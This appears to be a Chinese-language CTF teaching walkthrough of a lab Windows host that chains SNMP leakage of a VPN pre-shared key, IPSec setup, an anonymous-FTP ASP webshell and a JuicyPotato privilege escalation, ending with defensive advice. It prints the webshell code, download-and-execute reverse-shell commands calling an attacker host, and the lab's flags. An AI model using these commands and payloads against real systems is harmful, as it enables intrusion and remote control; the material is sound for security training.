SNMP配置不当与IPSec漏洞利用综合渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>
使用Nmap进行UDP端口扫描：<\/p>
sudo nmap -sU -sC --top-ports 20<\/span> 10.10.10.116
<\/span><\/span><\/code><\/pre>关键发现：<\/p>

UDP 161端口开放：SNMP服务<\/li>
UDP 500端口开放：ISAKMP\/IKE服务<\/li>
<\/ul>
1.2 SNMP信息泄露<\/h3>
通过SNMP walk获取敏感信息：<\/p>
snmpwalk -v 2c -c public 10.10.10.116
<\/span><\/span><\/code><\/pre>发现关键信息：<\/p>

IKE VPN预共享密钥(PSK)：9C8B1A372B1878851BE2C097031B6E43<\/code><\/li>
对应明文密码：Dudecake1!<\/code><\/li>
<\/ul>
2. IPSec\/IKE漏洞利用<\/h2>
2.1 IKE扫描与分析<\/h3>
使用ike-scan工具：<\/p>
ike-scan -M 10.10.10.116
<\/span><\/span><\/code><\/pre>关键发现：<\/p>

加密算法：3DES<\/li>
哈希算法：SHA1<\/li>
Diffie-Hellman组：modp1024 (Group 2)<\/li>
认证方式：PSK<\/li>
操作系统：Windows 8<\/li>
支持功能：NAT-T、IKE Fragmentation等<\/li>
<\/ul>
2.2 IPSec VPN配置<\/h3>

安装StrongSwan：<\/li>
<\/ol>
apt install strongswan
<\/span><\/span><\/code><\/pre>
添加预共享密钥：<\/li>
<\/ol>
echo '10.10.10.116 : PSK "Dudecake1!"'<\/span> >> \/etc\/ipsec.secrets
<\/span><\/span><\/code><\/pre>
配置IPSec连接：

编辑\/etc\/ipsec.conf<\/code>：<\/li>
<\/ol>
conn Conceal
    type=transport
    keyexchange=ikev1
    right=10.10.10.116
    authby=psk
    rightprotoport=tcp
    leftprotoport=tcp
    esp=3des-sha1
    ike=3des-sha1-modp1024
    auto=start
<\/code><\/pre>

启动IPSec服务：<\/li>
<\/ol>
sudo ipsec stop
<\/span><\/span>sudo ipsec start --nofork
<\/span><\/span><\/code><\/pre>3. 进一步端口扫描<\/h2>
TCP端口扫描：<\/p>
nmap -p- 10.10.10.116 --min-rate 1000<\/span> -sC -sV -Pn
<\/span><\/span><\/code><\/pre>发现开放服务：<\/p>

21\/tcp: FTP (匿名访问可能)<\/li>
80\/tcp: HTTP<\/li>
135\/tcp: MSRPC<\/li>
139\/tcp: NetBIOS<\/li>
445\/tcp: SMB<\/li>
49664-49670\/tcp: 未知服务<\/li>
<\/ul>
4. Web应用渗透<\/h2>
4.1 目录扫描<\/h3>
使用feroxbuster：<\/p>
feroxbuster --url http:\/\/10.10.10.116\/
<\/span><\/span><\/code><\/pre>4.2 Webshell上传<\/h3>

通过FTP匿名访问上传ASP webshell：<\/li>
<\/ol>
ftp 10.10.10.116
<\/span><\/span>ftp> put \/tmp\/cmd.asp cmd.asp
<\/span><\/span><\/code><\/pre>
Webshell内容：<\/li>
<\/ol>
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
<\/code><\/pre>

执行命令验证：<\/li>
<\/ol>
curl 'http:\/\/10.10.10.116\/upload\/cmd.asp?cmd=whoami'<\/span>
<\/span><\/span><\/code><\/pre>
获取反向shell：<\/li>
<\/ol>
curl 'http:\/\/10.10.10.116\/upload\/cmd.asp?cmd=powershell%20iex(New-Object%20Net.Webclient).downloadstring(%27http:\/\/10.10.16.24\/Invoke-PowerShellTcp.ps1%27)'<\/span>
<\/span><\/span><\/code><\/pre>获取user flag：

40f01e72608dd988c673747d37709f84<\/code><\/p>
5. 权限提升<\/h2>
5.1 检查当前权限<\/h3>
whoami \/priv
<\/span><\/span><\/code><\/pre>关键权限：<\/p>

SeImpersonatePrivilege: Enabled<\/li>
SeChangeNotifyPrivilege: Enabled<\/li>
<\/ul>
5.2 使用JuicyPotato提权<\/h3>

下载JuicyPotato：<\/li>
<\/ol>
invoke-webrequest -uri http:<\/span>\/\/10.10.16.24\/JuicyPotato.exe -outfile JuicyPotato.exe
<\/span><\/span><\/code><\/pre>
准备反向shell脚本：<\/li>
<\/ol>
echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http:\/\/10.10.16.24\/Invoke-PowerShellTcp.ps1')"<\/span>>reverse.bat
<\/span><\/span><\/code><\/pre>
查找合适的CLSID：<\/li>
<\/ol>

系统版本：Windows 10 Enterprise<\/li>
参考CLSID列表：https:\/\/github.com\/ohpe\/juicy-potato\/tree\/master\/CLSID\/Windows_10_Enterprise<\/li>
<\/ul>

执行JuicyPotato：<\/li>
<\/ol>
.\JuicyPotato.exe -t * -p "C:\users\Destitute\appdata\local\Temp\reverse.bat"<\/span> -l 9001 -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"<\/span>
<\/span><\/span><\/code><\/pre>获取root flag：

c07091f9c5a235ac0f778f9c466ab9ee<\/code><\/p>
6. 关键知识点总结<\/h2>
6.1 SNMP安全风险<\/h3>

默认community string(如public)易被利用<\/li>
可能泄露系统配置、网络拓扑等敏感信息<\/li>
应使用SNMPv3并启用加密认证<\/li>
<\/ul>
6.2 IPSec\/IKE安全配置<\/h3>

避免使用弱加密算法(如3DES)<\/li>
使用更强的Diffie-Hellman组(如Group 14或更高)<\/li>
定期更换预共享密钥<\/li>
考虑使用证书认证替代PSK<\/li>
<\/ul>
6.3 文件上传漏洞防护<\/h3>

禁用匿名FTP访问<\/li>
实施文件类型白名单验证<\/li>
设置上传目录无执行权限<\/li>
定期清理上传目录<\/li>
<\/ul>
6.4 Windows权限提升防护<\/h3>

限制SeImpersonatePrivilege等危险权限的分配<\/li>
及时安装系统补丁<\/li>
监控可疑的COM\/DCOM活动<\/li>
实施最小权限原则<\/li>
<\/ul>
7. 防御建议<\/h2>


SNMP服务<\/strong>：<\/p>

禁用不必要的SNMP服务<\/li>
使用SNMPv3并配置强认证<\/li>
限制SNMP访问源IP<\/li>
<\/ul>
<\/li>

IPSec VPN<\/strong>：<\/p>

升级到IKEv2<\/li>
使用AES-256等强加密算法<\/li>
实施证书认证<\/li>
<\/ul>
<\/li>

Web服务器<\/strong>：<\/p>

禁用不必要的HTTP方法<\/li>
实施严格的文件上传控制<\/li>
定期进行安全审计<\/li>
<\/ul>
<\/li>

系统权限<\/strong>：<\/p>

定期审核用户权限分配<\/li>
监控特权操作<\/li>
及时安装安全更新<\/li>
<\/ul>
<\/li>

日志监控<\/strong>：<\/p>

集中收集和分析安全日志<\/li>
设置异常行为告警<\/li>
保留足够时间的日志记录<\/li>
<\/ul>
<\/li>
<\/ol>